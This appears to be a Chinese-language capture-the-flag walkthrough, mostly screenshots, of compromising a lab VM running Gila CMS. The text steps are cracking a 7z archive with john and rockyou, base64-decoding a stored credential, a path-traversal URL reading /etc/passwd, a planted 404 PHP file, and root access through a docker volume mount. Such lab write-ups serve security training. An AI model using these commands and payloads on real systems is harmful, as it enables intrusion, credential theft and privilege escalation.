一、信息收集
ip、端口、指纹
![](https://upload-images.jianshu.io/upload_images/4664072-3c2720e7591daaea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
目录扫描
![](https://upload-images.jianshu.io/upload_images/4664072-a36df9096dae86ff.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看frp文件
![](https://upload-images.jianshu.io/upload_images/4664072-883523d34c5038fb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-002deefbefa98aae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
密码破解
![](https://upload-images.jianshu.io/upload_images/4664072-6c0092e3332e9ade.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
失败换一个
https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py
python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
![](https://upload-images.jianshu.io/upload_images/4664072-a75724da7f009946.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3fe031de6e5b9942.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
解码
echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d
![](https://upload-images.jianshu.io/upload_images/4664072-a7ddf8cc60f00ebb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
gila:admin@gmail.com:princesa
![](https://upload-images.jianshu.io/upload_images/4664072-43fac15624e4ca89.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b26812da42bc71a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查找版本漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-e7630121ae28d1eb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fa2bd8a5d40a5184.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.152.132/gila/admin/fm/?f=src../../../../etc/passwd
![](https://upload-images.jianshu.io/upload_images/4664072-261685b8636b70fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
修改文件
![](https://upload-images.jianshu.io/upload_images/4664072-59dafdbbcaa6bd2b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
创建404php
![](https://upload-images.jianshu.io/upload_images/4664072-40ac52324b9fc67a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-641af74e74131b58.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现docker
![](https://upload-images.jianshu.io/upload_images/4664072-8e7b0af0bd9b00d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
docker run -v /root:/mnt -it alpine
![](https://upload-images.jianshu.io/upload_images/4664072-4f4d2d0aaedf782e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a40b86f2a64fc816.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)